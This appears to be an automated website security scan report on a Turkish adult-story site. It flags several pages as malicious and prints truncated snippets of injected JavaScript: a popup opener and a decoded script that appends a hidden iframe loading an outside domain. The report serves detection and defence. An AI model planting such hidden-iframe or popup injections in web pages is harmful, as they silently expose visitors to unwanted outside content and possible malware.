Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cinselitiraflar.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cinselitiraflar.com/ | 200 OK Content-Length: 38436 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var puShown=false;function doOpen(url) {if(puShown==true) {return true;} win=window.open(url,'ljPu','toolbar,status,resizable,scrollbars,menubar,location,height=760,width=800');if(win) {win.blur();puShown=true;} return win;} function setCookie(name,value,time) {var expires=new Date();expires.setTime(expires.getTime()+time);document.cookie=name+'='+value+'; expires='+expires.toGMTString();} function getCookie(name){var co ...[602 bytes skipped]... Decoded script: ...[14006 bytes skipped]... nload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20var%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.width%20%3D%20%27180px%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.height%20%3D%20%27200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _0OO=document.createElement('script');_0OO.src='http://jquery ...[1743 bytes skipped]... Antivirus reports:
| ||
http://cinselitiraflar.com/wp-content/themes/xure/js/dropmenu.jquery.js.pagespeed.jm.CHO8IGIIn5.js | 200 OK Content-Length: 53817 Content-Type: text/javascript | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 10591 Content-Type: text/javascript | clean |
http://cinselitiraflar.com/category/ensest-hikayeler | 200 OK Content-Length: 151 Content-Type: text/html | clean |
http://cinselitiraflar.com/test404page.js | 404 Not Found Content-Length: 37661 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var puShown = false; function doOpen(url) { if ( puShown == true ) { return true; } win = window.open(url, 'ljPu', 'toolbar,status,resizable,scrollbars,menubar,location,height=760,width=800'); if ( win ) ...[2014 bytes skipped]... Decoded script: ...[14006 bytes skipped]... nload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20var%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.width%20%3D%20%27180px%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.height%20%3D%20%27200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _0OO=document.createElement('script');_0OO.src='http://jquery ...[1743 bytes skipped]... Antivirus reports:
| ||
http://cinselitiraflar.com/wp-content/themes/xure/js/dropmenu.jquery.js | 200 OK Content-Length: 54106 Content-Type: application/x-javascript | clean |
http://cinselitiraflar.com/wp-content/themes/xure/js/dropmenu.js | 200 OK Content-Length: 342 Content-Type: application/x-javascript | clean |
http://cinselitiraflar.com/category/erotik-hikayeler | 200 OK Content-Length: 151 Content-Type: text/html | clean |
http://cinselitiraflar.com/category/lezbiyen-hikayeler | 200 OK Content-Length: 151 Content-Type: text/html | clean |
http://cinselitiraflar.com/category/sikis-hikayeler | 200 OK Content-Length: 151 Content-Type: text/html | clean |
http://cinselitiraflar.com/category/tecavuz-hikayeler | 200 OK Content-Length: 151 Content-Type: text/html | clean |
http://cinselitiraflar.com/category/sex-hikayeler | 200 OK Content-Length: 151 Content-Type: text/html | clean |
http://cinselitiraflar.com/ensest-hikayeler/adana-escort.html | 200 OK Content-Length: 31194 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var puShown=false;function doOpen(url) {if(puShown==true) {return true;} win=window.open(url,'ljPu','toolbar,status,resizable,scrollbars,menubar,location,height=760,width=800');if(win) {win.blur();puShown=true;} return win;} function setCookie(name,value,time) {var expires=new Date();expires.setTime(expires.getTime()+time);document.cookie=name+'='+value+'; expires='+expires.toGMTString();} function getCookie(name){var co ...[602 bytes skipped]... Decoded script: ...[14006 bytes skipped]... nload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20var%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.width%20%3D%20%27180px%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.height%20%3D%20%27200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _0OO=document.createElement('script');_0OO.src='http://jquery ...[1743 bytes skipped]... Antivirus reports:
| ||
http://cinselitiraflar.com/author/admin | 200 OK Content-Length: 151 Content-Type: text/html | clean |
http://cinselitiraflar.com/category/mobil-hikayeler | 200 OK Content-Length: 151 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cinselitiraflar.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache
Connection: close
Date: Mon, 12 Jan 2015 17:39:16 GMT
Server: nekil
Vary: Accept-Encoding
Content-Length: 38436
Content-Type: text/html; charset=UTF-8
X-Cache: Nekil.com
X-Mod-Pagespeed: 1.6.29.7-3566
X-Pingback: http://cinselitiraflar.com/xmlrpc.php
X-Powered-By: PHP/5.3.19
...38436 bytes of data.
GET / HTTP/1.1
Host: cinselitiraflar.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache
Connection: close
Date: Mon, 12 Jan 2015 17:39:16 GMT
Server: nekil
Vary: Accept-Encoding
Content-Length: 38436
Content-Type: text/html; charset=UTF-8
X-Cache: Nekil.com
X-Mod-Pagespeed: 1.6.29.7-3566
X-Pingback: http://cinselitiraflar.com/xmlrpc.php
X-Powered-By: PHP/5.3.19
...38436 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cinselitiraflar.com
Referer: http://www.google.com/search?q=cinselitiraflar.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cinselitiraflar.com
Referer: http://www.google.com/search?q=cinselitiraflar.com
Result:
The result is similar to the first query. There are no suspicious redirects found.